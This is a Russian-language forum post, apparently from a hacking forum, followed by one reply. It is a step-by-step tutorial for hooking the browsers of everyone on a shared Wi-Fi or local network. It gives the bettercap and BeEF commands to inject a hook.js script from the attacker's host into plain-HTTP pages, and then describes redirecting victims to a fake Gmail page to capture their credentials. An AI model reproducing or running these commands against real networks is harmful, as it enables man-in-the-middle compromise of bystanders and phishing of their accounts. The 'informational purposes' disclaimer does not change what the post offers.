Вся информация представлена в ознакомительных целях! Всем привет! Сегодня расскажу как можно похакать любые устройства в вашей сетке, и сделать это массово. Итак нам понадобится : - Kali Linux - beef-xss framework - bettercap Установим bettercap на Kali Linux: Код: apt install build-essential ruby-dev libpcap-dev net-tools gem install bettercap Beef в Kali уже установлен. Запускаем beef. Логин beef, пароль beef. Код: service beef-xss start Если проблемы с авторизацией, запускаем из папки: Код: cd /usr/share/beef ./beef Подключаемся к любой вай-фай сети. Работает и в локалке, но не суть. Запускаем bettercap: Код: bettercap --proxy --proxy-module injects --js-url "http://192.168.57.128:3000/hook.js" Указываем ваш ip. Почему не локалхост думаю понятно. Тут происходит инжект скрипта beef'а. Снифаем траффик, подстраиваемся под запрос, встраиваем скрипт и отправляем обратно тому кто сделал запрос. Работает, если человек зашел на страницу без ssl, т.е по протоколу http. Как только он закроет страницу, связь с ним пропадает. Все браузеры-зомби которые подцепил beef отобразятся в меню слева. Пока они онлайн, можно использовать различные модули и экплоиты на них. Beef содержит множество модулей. Вам остается только подобрать нужные для ваших векторов атак. Все зависит от браузера и то в каких контекстах безопасности он находится. Каждый контекст может обеспечивать набор уникальных векторов атак. Например, можно направить пользователя на фейк gmail. Выбираем нужный модуль, жмем execute. У пользователя-зомби произойдет редирект на фейк. Если он введет свой логин и пароль, то они отобразятся у нас в панели. На этом все. Спасибо за внимание.
@TAYZLE,на ютубе чувак самый первый придумал этот взлом потом абсолютрно все распростроняли до тебя в телеге и тд и об этом знали ну очень большое число людей